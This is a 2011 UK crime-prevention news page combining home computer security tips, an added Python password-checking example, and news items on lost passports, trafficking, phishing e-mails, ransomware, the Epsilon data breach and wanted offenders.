You have good reason to be nervous when using your credit card number to shop online. After all, you may know little or nothing about the company you're buying from, and your credit card information is at risk of being compromised in a data breach. Using a virtual credit card number is one way to make your Internet shopping excursions more secure.

Essentially a wrapper for your regular credit card or debit card account, a virtual card number is good for one use only. When you use the virtual number, the bank that supplied it charges your purchase to your regular credit or debit card, but hackers never gain access to the underlying credit card information.

Editor's Note - I haven't heard of a UK financial institution offering this type of credit card facility. Another alternative is a pre-paid credit card. These cards cost around £5 to purchase and there is often a charge for recharging the card with money, but how much are you willing to pay for peace of mind? These pre-paid cards can also be used on trips abroad.

2. Secure your Wi-Fi
Is your Wi-Fi network at home password-protected? If not, it should be. You might not care if your neighbors use your Wi-Fi connection to surf the Web, but someone with more sinister motives could take advantage of your generosity (and lack of protection) to gain access to data stored on your home PCs.

The easiest way to guard against Wi-Fi interlopers is to encrypt your Wi-Fi network. Afterward you'll have to enter a password whenever you connect to your Wi-Fi network, but that's a small price to pay for improved security. Most Wi-Fi routers support WEP, WPA, and WPA2 encryption standards. Be sure to use either the WPA or WPA2 encryption settings, which provide a much higher level of security than WEP encryption.

Another safeguard is to set your Wi-Fi router not to broadcast the SSID (your network's name). With SSID broadcasting disabled, your wireless network won't be visible to computers nearby, and only people who specifically know your network's name will be able to find it. The procedure for locking down your Wi-Fi will vary depending on your router's model and manufacturer. Check the router's documentation for instructions.

Editor's Note - Also check if your router's password is still set to default. If it is, that is also worth changing. Within the UK there are not that many internet service providers (ISPs) so there will be tens of thousands of similar routers operating on their network. A great target for hackers to attack by controlling routers and altering their settings.

3. Encrypt Your Hard Drives
Hard drives and USB flash drives are treasure troves of personal data. They're also among the most common sources of data leaks. If you lose a flash drive, external hard drive, or laptop containing sensitive personal information, you will be at risk. Fortunately, encrypting your hard drive can give your data an extra layer of protection beyond setting up a system password. Encryption will conceal your drive's data and make accessing the files almost impossible for anyone who does not know your encryption password.

The Ultimate and Business editions of Windows 7 and Vista come with BitLocker, a tool that lets you encrypt your entire hard drive. For its part, Mac OS X includes FileVault, a tool for encrypting your Mac's home folder; Lion, the next major Mac OS X release on the horizon, will be able to encrypt a whole hard drive.


4. Keep Your Software Up-to-Date
One of the simplest but most important security precautions you should take is to keep your PC's software up-to-date. I'm not talking exclusively about Windows here: Adobe, Apple, Mozilla, and other software makers periodically release fixes for various bugs and security flaws. Cybercriminals commonly exploit known vulnerabilities, and Adobe Reader is a constant target of such assaults.

Most major commercial software packages come with some sort of automatic updating feature that will inform you when a new update is available. Don't ignore these messages; install updates as soon as you can when you're prompted to do so. It's a little bit of a hassle, but it can prevent major headaches later on.

5. Upgrade to the latest antivirus software
If you're running antivirus software from two or three years ago, you should upgrade to the most recent version, even if you still receive up-to-date malware signature files for the older edition. The underlying technology for antivirus software has improved significantly in recent years.

To detect threats, antivirus products today don't rely solely on the traditional signature files (regularly updated files that identify the latest malware). They also use heuristic techniques to detect and block infections that no one has seen yet. Given how frequently new viruses crop up in the wild, the ability to protect against unknown malware is critical.

6. Lock down your smartphone
If you use your smartphone the way I use mine, your handset probably contains lots of personal information: e-mail addresses, photos, phone contacts, Facebook and Twitter apps, and the like. That accumulation of valuable data makes smartphones a tempting target for thieves and cybercriminals, which is why the smartphone is shaping up as the next big security battleground.

Android phones are already being hit with Trojan horses and other types of malware, and security experts agree that mobile malware is still in its infancy. Worse, many users don't think of their phones as computers (though that's what the devices are), so they don't take the same security precautions they would with a PC. If you haven't downloaded a security app for your Android phone, you should. Most smartphone security apps are free, and it's far better to have one and never need it than to get caught off-guard and exposed without one.

Because Apple's App Store takes a more restrictive approach to apps offered for sale there, iPhone owners generally don't have to worry as much about malware, though it's always possible for something to slip through the cracks. Apple hasn't allowed any proper antivirus applications into the App Store, either, but you do have some security options.

One more tip: When choosing a mobile antivirus program, it's safest to stick with well-known brands. Otherwise, you risk getting infected by malware disguised as an antivirus app.

7. Install a link-checker plug-in
Security threats may lurk in seemingly innocuous Web pages. Legitimate sites may get hacked, cybercriminals game search engines to make sure that their infected pages come up in searches for hot topics (a technique known as "search engine poisoning"), and seemingly safe sites may harbor malware. Although you have no way to guard against these attacks completely, using a link checker can help protect you from many of them.

Link-checker tools typically show small badges next to links in search results and elsewhere to indicate whether a site is trustworthy, dangerous, or questionable. Many such tools also add a status indicator to your browser's toolbar to signal the presence of any problems with the site that you're currently visiting. Many security suites come with a link scanner.

8. Don't neglect physical security
A thief can snatch an unattended laptop from a desk and walk away in a matter of seconds. And a thief who has your laptop may have access to your files and personal information. A notebook lock won't prevent someone from cutting the cable, but it can deter crimes of opportunity.

Kensington is probably best-known for its notebook locks; it offers an array of locks for laptops and desktops. Targus is a second vendor that specializes in laptop security gear, including one lock that sounds an alarm when someone tries to pick up the attached laptop or cut the lock cable.

Prying eyes are a common security hazard. To prevent unauthorized viewing of your data when you step away from your desk, always lock your screen before leaving your PC unattended. To do this, simply hold down the Windows key and type the letter L. This will bring up the lock screen. To get back to work, press Ctrl-Alt-Delete, and enter your login password at the prompt.


9. Make HTTPS your friend
When you're browsing the Web, protect yourself by using HTTPS (Hypertext Transfer Protocol Secure) whenever possible. HTTPS encrypts the connection between your PC and the Website you're visiting. Though HTTPS doesn't guarantee that a site is secure, it can help prevent other parties from hacking into the network and gaining access to your account.

Many sites use HTTPS by default: When you purchase an item online or log in to online banking, for instance, your browser will probably connect to the site via HTTPS automatically. But you can go one step further by enabling HTTPS on Facebook, Twitter, and Gmail.

To use Facebook's HTTPS feature, log in to Facebook and click Account in the upper-right corner. Select Account Settings from the drop-down menu, and look for 'Account Security' on the resulting page. Under the Account Security heading, click Change, check the box next to Browse Facebook on a secure connection (https) whenever possible, and click Save.

For Twitter, first log in to your account. If you're using the new Twitter interface, click your account name in the upper-right part of the screen, and select settings. (If you're still using the old Twitter interface, click the Settings link in the upper right of the window.) From there, scroll down to the bottom of the resulting page, check the box next to Always use HTTPS, and click Save.

To enable HTTPS on Gmail, log in to your account, click the gear icon in the upper-right corner, and select Mail Settings from the drop-down menu. Next, under the Browser Connection heading, select the button labeled Always use https. When you're all set, scroll to the bottom of the page and click Save Changes. To learn more about Gmail security, visit Google's Gmail Security Checklist page.

10. Avoid public computers and Wi-Fi
As convenient as free Wi-Fi and publicly available computers may be at, say, a public library or café, using them can leave you and your personal information exposed. Public computers might be infected with spyware and other types of malware designed to track your movements online and harvest your passwords.

The same is true of open Wi-Fi networks. Cyberthieves may set up rogue Wi-Fi networks that look legitimate (for instance, one may be named for the café that you're visiting) but enable the crooks to collect your personal information.

Sometimes, you may have no choice but to use a public computer or Wi-Fi network. When you do, don't use it to check your e-mail or social network accounts, conduct online banking, or perform any other action that entails logging in to a site. If you have access to a VPN, use it.

11. Be password smart
You probably know already that using obvious or easy-to-discover passwords like "password" or your pet's name is a bad idea. But how can you make your passwords significantly more secure?

First, you need to use a different long, strong password for each account. Hackers often attempt to break into accounts by employing a "dictionary attack," which involves using words straight from the dictionary to guess your password. So don't use standard words as your passwords; instead, try creating them from a combination of letters, numbers, and symbols. And don't simply replace letters in a word with a symbol (for example, using the @ symbol in place of an A); it's too common a trick. You can also strengthen your passwords by using a mix of lowercase and capital letters.

Basically, the more complex a password is, the better. But try to use something that you'll be able to remember--a mnemonic of some sort that incorporates various alphanumeric symbols and that nobody but you would know.
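The advice in this tip can be checked mechanically. The following is an added example, not part of the original article: a short Python audit that flags passwords built on a dictionary word even after symbol swaps such as @ for A, and passwords reused across accounts. The word list, the substitution table, the 12-character minimum and the sample accounts are all constructed assumptions for illustration.

```python
import re

# Constructed mini word list; a real audit would load a full dictionary file.
WORDLIST = {"password", "dragon", "monkey", "sunshine", "letmein", "rover"}

# Common symbol-for-letter swaps (assumed table). Guessing tools undo these
# automatically, which is why the article calls the trick "too common".
SUBSTITUTIONS = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "l",
                               "!": "i", "0": "o", "$": "s", "5": "s",
                               "7": "t"})

MIN_LENGTH = 12  # assumption: the article only says "long"

# One pattern per character class the article recommends mixing.
CHAR_CLASSES = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")


def dictionary_core(password, wordlist=WORDLIST):
    """Return the dictionary word a password is built on, or None.

    Two candidates are tried: the whole password with swaps reversed, and
    the password with leading/trailing digits and punctuation removed
    before the swaps are reversed (catches 'Rover2011' and 'P@ssw0rd!').
    """
    lowered = password.lower()
    trimmed = re.sub(r"^[^a-z]+|[^a-z]+$", "", lowered)
    for candidate in (lowered, trimmed):
        word = candidate.translate(SUBSTITUTIONS)
        if word in wordlist:
            return word
    return None


def audit_password(password, wordlist=WORDLIST):
    """Return a list of weaknesses; an empty list means none were found."""
    findings = []
    if len(password) < MIN_LENGTH:
        findings.append("too short")
    word = dictionary_core(password, wordlist)
    if word:
        findings.append(f"based on dictionary word '{word}'")
    missing = sum(1 for pattern in CHAR_CLASSES
                  if not re.search(pattern, password))
    if missing:
        findings.append(f"missing {missing} character class(es)")
    return findings


def audit_accounts(accounts, wordlist=WORDLIST):
    """Audit every account's password and flag reuse between accounts."""
    by_password = {}
    for account, password in accounts.items():
        by_password.setdefault(password, []).append(account)

    report = {}
    for account, password in accounts.items():
        findings = audit_password(password, wordlist)
        others = sorted(a for a in by_password[password] if a != account)
        if others:
            findings.append("reused on " + ", ".join(others))
        report[account] = findings
    return report


# Constructed sample data: account name -> password.
SAMPLE_ACCOUNTS = {
    "email": "P@ssw0rd!",
    "bank": "P@ssw0rd!",
    "shop": "Rover2011",
    "forum": "tq7#Lm2vX!9pRz",
}

if __name__ == "__main__":
    for account, findings in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{account}: {'; '.join(findings) if findings else 'ok'}")
```

An empty result only means none of these particular checks fired; it does not prove a password is strong.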


12. Check your credit report each year
Unfortunately, even if you do everything right, bad guys might still succeed in stealing your identity. After all, you can control who has access to your personal information, but you can't control how well a company that you do business with secures its personal-data records.

Nevertheless, you can limit the damage that would result from undetected identity theft by checking your credit report regularly. Periodically checking your credit report is a good way to make sure that no one has opened credit card or bank accounts under your name. Credit reports can be obtained from major credit agencies like Equifax and Experian.


(1st May 2011)


THOUSANDS OF UK PASSPORTS "THROWN OUT WITH RUBBISH"
(BBC News, dated 22nd April 2011)
www.bbc.co.uk
Category : crime prevention

Some 10,000 passports a year are probably thrown in bins, says the UK's Identity and Passport Service (IPS).

Launching a campaign urging people to keep passports safe, it warns the same number are lost in bars and clubs.

The IPS said it had had reports of passports being stolen at gunpoint in Brazil, lost in jail, and left in the pocket of a coat donated to a tramp.

The IPS based its findings on analysis of applications for replacement passports, which cost £77.50.

Men replace more than 162,500 lost and stolen passports a year compared with about 112,000 by women, the IPS says.

Criminal gangs
 
Of all the lost and stolen passports in the UK, people in their 20s were responsible for 42.8% of the total - more than twice as many as the next nearest age group.

Those in their 30s lost 20.8% followed by people in their 40s, who lost 12.8%.

IPS chief executive Sarah Rapson warned that passports were becoming increasingly attractive to criminal gangs wanting to steal identities.

She said: "It's really important that you keep it safe both when you are at home and when you're abroad. Remember to put your passport away after use. Don't leave it in a trouser or shirt pocket in the laundry pile."

Some of the colourful reasons given for why people were parted from their passports include:

- Taxi attacked by gunman on way to airport in Brazil
- Fell out of bag while snowboarding
- Drunk boyfriend (now ex) destroyed it
- Last seen in pocket of a coat donated to tramp
- Wallet stolen at children's party with passport inside
- Passports stored in safe in Turkish villa, thieves stole safe
- Put in bin by infant daughter; and
- Put on a fire with clothes

The service advised people to keep their passport in a place they can remember and to only carry it when absolutely necessary.

It said people should use alternatives if they needed to prove their age and should keep a note of the number to help speed up the issuing of replacements.

Lost and stolen by age

Teenagers - 6.3%
20s - 42.8%
30s - 20.8%
40s - 12.8%
50s - 10.2%
60s - 5.3%
70s - 1.6%
80s - 0.2%
Source: IPS


 Additional information

Your UK passport can be the key to so many things: obviously travelling outside the UK, but also the purchase of foreign currency, proving your ID when signing up for some utilities and, just observed today, returning an unwanted PlayStation to HMV for a refund! There is so much information within a passport that can be used by criminals to steal your ID; it is not just a piece of paper.

So, keep it safe, make a note of the reference number (that is individual to you) and register your travel arrangements and passport reference on the Government's Foreign and Commonwealth Office (FCO) LOCATE website.

(1st May 2011)



DRUGS SLAVE SMUGGLING RING BUSTED IN EUROPE-WIDE CRACKDOWN
(Metro, dated 21st April 2011 author Ros McGuinness)
www.metro.co.uk

A slave smuggling ring believed to be behind thousands of Britain's cannabis farms has been smashed by police in a Europe-wide crackdown.

The traffickers tricked Vietnamese victims into parting with as much as £17,500 to be smuggled into Europe, falsely promising them paid work when they arrived.

But many were sold into the sex industry or ordered to work at drug farms.

The so-called 'gardeners' can cultivate an entire crop in two months.

Police claim the gang - which has also been linked with five murders - ran more than 6,500 such farms found operating in Britain last year.

Some 98 arrests have been made and 114 victims discovered across six countries since the start of the European Union operation - called Vietnamese Organised Immigration Crime - two years ago.

Andy Baker, of the Serious Organised Crime Agency, said the arrests had helped stem the illegal activities on British soil. He added: 'It's been a success so far but other people are part of the game.

'The criminals continue on, so we must keep going, dismantling and disrupting the criminal market.'

Zoltan Boross, of Hungary's National Investigation Office, said several counterfeiters who prepared fake documents for the Vietnamese victims were being questioned.

'Their main target was Britain but the Vietnamese were also being smuggled into France and Germany,' he added.

There are an estimated 35,000 illegal Vietnamese immigrants in Britain, attracted by annual earnings that could feed a family of ten for a decade in their home country.

Authorities in Ireland, Holland, Belgium, Italy, Poland, the Czech Republic and Slovakia supported the operation. British police were praised by European colleagues over their role, said Mr Baker.

(1st May 2011)


DIGITAL TECHNOLOGY PREVENTS RURAL CRIME
(Thames Valley Police, dated 19th April 2011)
www.thamesvalley.police.uk
Category : crime prevention

A new DVD aimed at preventing rural crime across the South East has been launched by five police forces that have worked with partners to produce 'Shutting the Gate on Rural Crime'.

This 16-minute film, aimed at farmers and rural business people, features National Farming Union president Peter Kendall, who is a Bedfordshire farmer and has been a victim of this type of crime.

He features in the opening sequence of the DVD, which has been produced by the police forces of Thames Valley, Hampshire, Surrey, Kent and Sussex, and urges the farming community to take greater precautions to protect their businesses.

In 2010 in England, 228 plant and agricultural vehicles were stolen. In 2009, there were 254 similar offences.

Last year in England and Wales 1,975 tractors and other agricultural vehicles were stolen at a cost to NFU Mutual in excess of £10m.

NFU South East regional director William White said: "The five police forces have demonstrated enormous commitment to tackling rural crime and reaching rural businesses. We will be ensuring that NFU members in the five force areas can watch this film. They must then take vital steps to protect their property effectively and to engage positively with police in the fight against crime."

The DVD features sections on:

Estate security
Equipment security
Counter terrorism
Wildlife crime
Animal crime
Heritage crime

'Shutting The Gate on Rural Crime' provides rural businesses with local police contacts and details of the Farm Watch scheme.

Mr White added: "The theft of farm machinery is costly and has a major impact on farmers' livelihoods. Farmers are frequently left without the tools of their trade and it is very difficult for them to replace specialist equipment.

"Farmers must become more proactive in protecting machinery, with the average modern tractor costing more than £60,000 and sometimes as much as £120,000."

Assistant Chief Constable John Campbell, of Thames Valley Police (pictured), said: "We know that we have some real issues regarding rural crime, including plant theft, scrap metal theft and more recently diesel theft. These offences really impact on the ability of farmers and rural communities to feel safe in their homes and workplaces. There are also links with serious organised crime, as some of the stolen machinery is worth many thousands of pounds.

"This DVD contains good sound common-sense advice that, if taken, should significantly reduce both the opportunities for crime and the crime itself.

"The support of the NFU has been fundamental to the success of this project. All five forces, working closely with the NFU and members of the rural community, hope that this initiative will contribute to a fall in rural crime across the region."

Anyone who would like a copy of the DVD should contact Sussex Police Community Safety and Crime Reduction Advisor, Trevor Cox, by emailing trevor.f.cox@sussex.pnn.police.uk.

The release of this film coincides with the launch in the Thames Valley Police area of a demonstration tractor with all the latest security features.

The tractor, a John Deere model, will be available to forces nationwide. It has been supported by rural insurer NFU Mutual and farm machinery dealership Farol.

(1st May 2011)



BEAT POLICE GET INSTANT ACCESS TO DATABASE RECORDING MOBILE THEFTS
(Courtesy of: Computeractive, dated 14th April 2011 author Dinah Greek)
www.computeractive.co.uk
Category : crime prevention

Time-consuming checks on stolen mobile devices become faster as the National Mobile Property Register is linked to the National Police.

 

Police on the beat will now be able to search the National Mobile Property Register (NMPR) to check whether mobile devices have been stolen.

The NMPR database set up in 2004 includes data on stolen or lost mobile devices such as mobile phones, tablets, iPads and even bikes.

According to the Metropolitan Police Mobile Phone Crime Unit, mobile phone theft in particular is a significant problem. Each year more than 350,000 are stolen in the UK. Each month officers make around 25,000 searches of the NMPR register, which is run by the Metropolitan Police Service (MPS).

But this has been a time-consuming process, taking 20 minutes or longer as officers on the beat have to contact their force control room to request a search of the register.

The National Police Improvement Agency (NPIA) has now integrated the register with the Police National Computer. Using handheld computers, officers can search the database themselves.

 Detective Chief Superintendent Mick McNally of the MPS' Territorial Policing Command, said: "For the first time front-line officers can now obtain instantaneous results of searches on suspected stolen mobile phones.

"It sends a clear message to phone thieves that police and partners can identify stolen mobile phones in the hands of the thief or another individual."

People can log the details of their devices, such as IMEI and serial numbers on the Immobilise website, which links directly with the NMPR. If a device is lost or stolen, the police can identify it and return it to its rightful owner.


To avoid buying stolen property, people can use the sister site, Checkmend.

www.immobilise.com (Ed's Note: this is a commercial website that is operated in support of UK Police)
www.checkmend.com/uk (Ed's Note: this is a commercial website, charging £1.99 / search)

(1st May 2011)


 

CONTINUING NEWS FROM MY SPAM INBOX - APRIL
Category : phishing
 
For the second month in a row I haven't received the regular adverts for various forms of pharmaceutical paraphernalia. My Internet Service Provider's (ISP) spam filter has continued to do a very good job. In the last 3 weeks it has managed to filter out 5 phishing e-mails and place them in a "be warned" post box.

The latest batch of phishing e-mails includes:

- TD Waterhouse Investor Services - Your latest monthly statement is available online for your review. Our records indicate you have not logged in since your latest statement was posted.

To view your statement: click on the following link and provide the requested details

This is a bogus link to encourage the recipient to provide their personal details (phishing).

- NACHA payment cancellation - NACHA is the "Electronic Payment Association" of the USA. It was formed in 1974 to come up with a standardised way of electronically transferring funds between financial institutions in the US. In 2008 it dealt with 18.2 billion financial transactions. So we now know who the bona fide organisation is, so what is the scam?

"The ACH transfer (ID: 3443214650961), recently initiated from your checking account (by you or any other person), was canceled by the other financial institution. Please click here to download further information"

This is a bogus link to encourage the recipient to provide their personal details (phishing).

- Lloyds TSB - We recently noticed one or more attempts to log in to your Lloyds TSB Internet Banking Account from a foreign IP address. Click on the "Verify my Account" link.

- UPS (United Parcel Service) - Much the same as the bogus DHL e-mail from the previous month. Two of these e-mails have been received, but quoting different notification / reference numbers.
The parcel was send to your home address. And it will arrice within 7 bussness day. More information and the tracking number are attached in linked document. ( nb. There was a document attached to this e-mail - this was probably infected with malicious software ).

As a continuing reminder - All of these e-mails are bogus and are just phishing for your personal information. If you receive them, delete them immediately; do not open any attachments or click on any links. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT the contact details within these bogus e-mails.

(18th April 2011)



CONSUMER WARNING OVER TICKET RESALE WEBSITES
(The Guardian, dated 13th April 2011 author Rebecca Smithers)
www.guardian.co.uk

Music fans looking to book tickets for one of the European summer festivals and sporting events are being warned to take care in the secondary ticket market.

The resale of tickets for sold out events is big business, and with the annual festival season almost underway there are fears that hundreds of UK consumers could, as in 2010, hand over their money but end up with no ticket.

The UK European Consumer Centre (UKECC) said today that it received 288 complaints and enquiries from UK consumers during 2010 relating to EU traders under its "recreational and cultural services" category, which includes ticket problems - an increase of more than a third (34%) on the 2009 figure of 215. Hungary and the Netherlands were the countries which attracted the most complaints from Britons.

The UKECC is co-funded by the European commission and the Department for Business, Innovation and Skills, and provides advice for consumers buying goods and services. It also deals with cross-border complaints and grievances from European consumers based in other EU countries regarding UK festivals.

It singled out the following as the main areas of complaint:

• Tickets failing to be delivered. Most terms and conditions state that tickets will arrive just before the event, but if this doesn't happen the seller may be long gone.

• Cancellation of an event after the consumer has purchased a ticket. The original seller's terms and conditions usually only allow for a refund of the ticket's face value, but secondary ticket sellers may have a huge mark-up, so a consumer may only get back a fraction of what he or she paid.

• Consumers turning up at a venue only to find their ticket is declined for being void.

• Valid tickets are provided, but problems at the event on the day may lead to the consumer being refused admittance to some areas.


Jed Mayatt, UKECC manager, said: "We want consumers to be cautious when buying tickets, particularly if an event is sold out. But the temptation of a website still offering tickets is too great for some people, even if it is at inflated prices."


An example highlighted by the UKECC was a UK consumer who bought a pair of tickets to a top-flight football game from an online ticketing company in Spain, for which she paid €381.92. The tickets were not sent to her home as promised, and although the trader promised these would be hand delivered before the game this failed to happen. She sought a refund, as well as damages for consequential losses, amounting to €627.23. After liaising with European Consumer Centre in Spain she was advised to go to the police as it was thought likely to be a scam.


The UK ECC's leaflet, "Can you rely on your festival tickets?" ( go to website : www.ukecc.net/sub.asp?id=190 ), outlines how consumers could be caught out, offers advice for purchasers, and addresses the question of legal protection. Music fans are also advised to contact the European Consumer Centre for Services for more information.


UK European Consumer Centre : www.ukecc.net/
European Commission : http://ec.europa.eu/
Department for Business Innovation and Skills : www.bis.gov.uk/

(18th April 2011)


 NEW PENALTIES FOR UNINSURED DRIVERS
(CSMA* Club magazine, April 2011 edition)

New rules come into force in late Spring making it illegal to own an uninsured car unless it has been declared off-road. It makes it an offence to even own an uninsured vehicle, rather than just drive one.
The new "Continuous Insurance Enforcement" rules aim to tackle the 1.4 million people who drive uninsured in Britain. According to the Motor Insurers Bureau, these drivers cost the rest of us £500 million a year as well as adding £30 to our car insurance premiums. Around 242,00 offenders are convicted yearly.
But the rules also mean there is no flexibility for those of us who perhaps only insure our sports car for the road in the Summer, and then keep it in the garage, uninsured, for the rest of the year.

Under the new rules, you must either make a SORN ( Statutory Off Road Notification) that your car is off the road, or have insurance all the time. The penalty for failing to do this is :

- A letter telling you that you appear to have an uninsured car that needs cover.
- If no action is taken, then a fine of £100 is levied.
- If still no action is taken, regardless of whether the fine is paid, then your car can be wheel-clamped, impounded or destroyed.
- You could face a court prosecution, with a possible maximum penalty of £1000.

Road Safety Minister Mike Penning says: "Uninsured drivers push up premiums for other motorists and they often drive with no regard for other road users, so it's vital we do everything we can to keep them off the roads. More than 400 vehicles are seized by the police every day, but it's just not possible to catch every uninsured driver in this way. These new powers will help us take real action".

* CSMA = Civil Service Motoring Association

(18th April 2011)


RANSOMWARE SQUEEZES USERS WITH BOGUS WINDOWS ACTIVATION DEMAND
(Computerworld, dated 11th April 2011 author Gregg Keizer)
www.computerworld.com

A new Trojan tries to extort money from users by convincing them to dial international telephone numbers to reactivate Windows, a security researcher said today.

Once on a PC, the malware displays a message claiming that Windows is "locked" and must be reactivated, said Mikko Hypponen, the chief research officer of Helsinki-based F-Secure. Users seeing the message cannot boot Windows in either normal or Safe mode, Hypponen said.

"This copy of Windows is locked. You may be a victim of fraud or there may be an internal error," the message states.

To regain control of the PC, users are told to reactivate Windows online or via a phone call. The former, however, is not available; a follow-up message instructs users to dial one of six telephone numbers, then enter a six-digit code to reactivate the operating system.

"The call from your country is free of charge," the second message alleges.

Not even close.

"They pretend to be Microsoft," said Hypponen, adding that the telephone numbers actually lead to an automated call center where users are kept on hold for several minutes, racking up long-distance charges.

F-Secure is trying to determine the location of the call center.

The scammers make money through what Hypponen called "short stopping," the practice of billing a call at a rate higher than the actual destination.

"The numbers are operated by rogue operators and lead to [countries with] very expensive phone rates, like the Dominican Republic or Somalia," Hypponen said in an interview Monday. "But the numbers actually end up in much cheaper countries. They charge you the full price.... That's how they make money."

F-Secure has seen that money-making mechanism used before in a Windows Mobile Trojan horse that secretly dialed international numbers to rack up charges via short stopping.

But it's new in "ransomware," the term describing malware that tries to extort a payment in return for returning control of the computer or its files to the owner.

"Ransomware makers come up with a new payment mechanism every time one is shut down," said Hypponen. One of the most prevalent pieces of ransomware, "GPcode," told victims to use a pre-paid credit card, an avenue that has since been blocked.

Extortion software like GPCode and the newest Trojan are not only booming, but present a clear danger to users, Hypponen argued.

"For the end user, most of the damage by malware is transient," he said. "If you're infected by a bot Trojan, your PC may send out lots of spam, but if anything, that slows down your PC only a bit. Even keyloggers, if they get ahold of your credit card, you don't actually lose money because you can get it back. But ransomware is bad news, because the PC is unusable or all your files are encrypted."

The solution to ransomware is to either fork over the payoff or roll back the PC to a prior backup, assuming one is available, said Hypponen.

Or in this case, enter the code F-Secure said was delivered by the call center, no matter what number is dialed.

That unlock code: 1351236.

"I hate the idea of paying money to these clowns," said Hypponen. "Just enter that code."

(18th April 2011)


 

FAKE "JACOB'S CREEK" WINE BOTTLES
(Metro, dated 6th April 2011 author Metro web reporter)
www.metro.co.uk

Hundreds of bottles of counterfeit Jacob's Creek vino have already been seized from off-licences around the country.

The wine seized includes the Cabernet Sauvignon 2007, Merlot 2009, Semillon Sauvignon Blanc 2008, Chardonnay 2009 and Semillon Chardonnay 2009.

Consumers have been told to keep an eye out for any bottles with the word 'Australia' misspelt - on the fake bottle it appears 'Austrlia'.

There is one other sign which indicates the plonk is not the real deal - it tastes terrible.

Pernod Ricard UK, the owner of Jacob's Creek, said it first noticed the problem when it began receiving complaints about the quality of the wine. The company immediately launched an investigation and discovered the fake bottles on sale.

The bottles, which normally retail for between £6 and £10, are believed to be from China and are being sold to off-licences and independent shops for as little as £2.

Deputy managing director of wine for Pernod Ricard Simon Thomas said: 'Tests indicate the content is not harmful but anyone with doubts concerning the authenticity should not consume it.'

Colin Houston, head of food fraud and incidents at the Food Standards Agency, urged consumers to remain vigilant and look out for bottles with spelling mistakes.

(18th April 2011)



SOME RETAILERS AND BANKS HAVE BEEN AFFECTED BY A SECURITY BREACH - BE WARNED

 

This morning when I opened my e-mails I had received two warnings of a security breach. One was from Marks and Spencer and the other was from Marriott, the hotel group. The e-mails had a common content and stated that their supplier's (Epsilon) computer system had been attacked by a hacker and that individuals who had their names and e-mail addresses registered to receive details of offers etc. were affected.

The e-mail went on to say that customers are warned to watch out for phishing attacks trying to obtain personal details. Phrases like "pushing the buck" and "slippery shoulders" came to my mind in relation to these two organisations' attitude.

The computing press was aware of this problem on Friday of last week. Epsilon is a marketing company which sends out millions of advertising e-mails on behalf of its clients every week. Currently they appear to be quite tight-lipped as to who has been affected, saying that only about 50 of their clients were hit. These include:

Financial

Ameriprise Financial ( Financial advice and Investment )
Barclays, Bank Best
Citibank ( Banking and Investments )
JP Morgan Chase ( banking and investment )
Robert Half ( Financial Recruitment )
US Bank

Retailer

AbeBooks (UK online book seller)
Buy Brookstone (US Coupon company )
Kroger (US Retail food chain)
Lacoste
Marks and Spencer
New York & Company (US Women's clothes retailer)
Target ( US general store chain )
Walgreens (US Pharmacy retailer)

Travel, Entertainment and publishing

Disney Destinations
Hilton Worldwide
Marriott International
McKinsey Quarterly (US Business journal)
TiVo

So effectively millions of customers of Epsilon clients are at potential risk. Please be warned that if you do deal with any of these organisations (and those currently unknown) you may start to receive e-mails from malicious sources. So, as always, do not divulge any information to unsolicited e-mails.

On the Epsilon website they state that they are the best at what they do. Obviously security doesn't come under that heading. My other concern is that the likes of Marks and Spencer don't check the level of security used by their suppliers before signing up to contracts!

For further information on this problem look at the article "ABOUT 50 CLIENTS HIT BY EPSILON E-MAIL MARKETING BREACH" in Business News section of this website.

(6th April 2011)


 

WHO DO YOU THINK YOU'RE TALKING TO ?
(West Yorkshire Police, dated 3rd April 2011)

West Yorkshire Police have launched an interactive DVD aimed at breaking down barriers between police and young people.

'Who do you think you're talking to?' is directed at both officers and youths and includes interviews with both groups about their perceptions of one another.

Puppets are used to represent those interviewed, while a virtual police office encourages viewers to take part in activities and discussions about the relationships with the police and youngsters.

Officers are able to listen to the views of young people about the police and how they are perceived by them.

The DVD will be shown around schools across the county and will also be used as a training resource for PCs and PCSOs about youth engagement.

Ch Supt Barry South of the Operations Support Division is featured in the DVD providing advice on how to build a rapport with the younger generation.

He said: "This is a clever and creative way of improving the relationship between young people and our officers. There is a negative perception of both sets of people and we want to be able to move away from the stereotypes and work together to improve the quality of life within our communities.

"We want young people to be able to see beyond the police uniform and to realise that we are not out there to target them but we are there to protect and serve the people of West Yorkshire, including them.

"The interviews featured in the DVD allow us, as police officers, to listen and learn about how young people really perceive us and we can take this on board and use this as a platform to improve youth engagement."

To access the resource please click on the following link

www.westyorkshire.police.uk/wypuploads/whodoyouthinkyouretalkingto/

(4th April 2011)


 

CEOP ADDS TWINS TO MOST WANTED
(CEOP, dated 1st April 2011)
www.ceop.police.uk

Twin brothers, Kenneth John and Thomas Anthony Parker, both convicted high risk child sex offenders are the focus of a new appeal, as the UK's national centre for child protection - the Child Exploitation and Online Protection (CEOP) Centre - joins forces with police in Sussex and Warwickshire to publish their details on the Most Wanted website.

CEOP's Most Wanted website - www.ceop.police.uk/wanted - has already seen 20 high risk convicted offenders located since its launch in 2006. The latest was earlier this month, when an offender handed himself in to police within 24 hours of being placed on the site.

Now Sussex and Warwickshire police are using the site to ask the public for help in locating the twins, who are classed as particularly high risk.

Kenneth John Parker and Thomas Anthony Parker, aged 56, are the 23rd and 24th offenders to have their details published on the website. They are both believed to have been in Europe, but their current location is unknown. They also have connections to France, Holland and Portugal and are believed to be together, although this is not confirmed.

They are both wanted for breaching their notification requirements of the sex offenders register, an offence which in itself carries up to five years in prison but in addition, Thomas Parker is wanted for a recall to prison.

Kenneth Parker is approx 5'8" tall, of medium build with short brown hair. He has distinctive tattoos on both his arms - a fish and wings from a Para regiment on his left arm and a dragon and a panther on his right.

Thomas Parker is approx 6'0" tall and is of a slim build. He has cropped brown hair and has previously had facial hair. He has a scar by his left eye and like his brother, has very distinctive tattoos on his arms - a Chinese carp, a naked lady, a swallow, a stallions head and a wizard.

It should be noted that they have both demonstrated violent tendencies in the past.

Since the launch of CEOP's Most Wanted site in November 2006, 20 of the 22 offenders posted have been located. These 20 offenders had been missing for a combined total of over 63 years.

Peter Davies, Chief Executive of the CEOP Centre says: "These are the second and third offenders to have been posted onto our Most Wanted site this month. Following the success of this month's previous offender handing himself in to the police, I want to ask members of the public to once again help us in locating these two dangerous individuals".

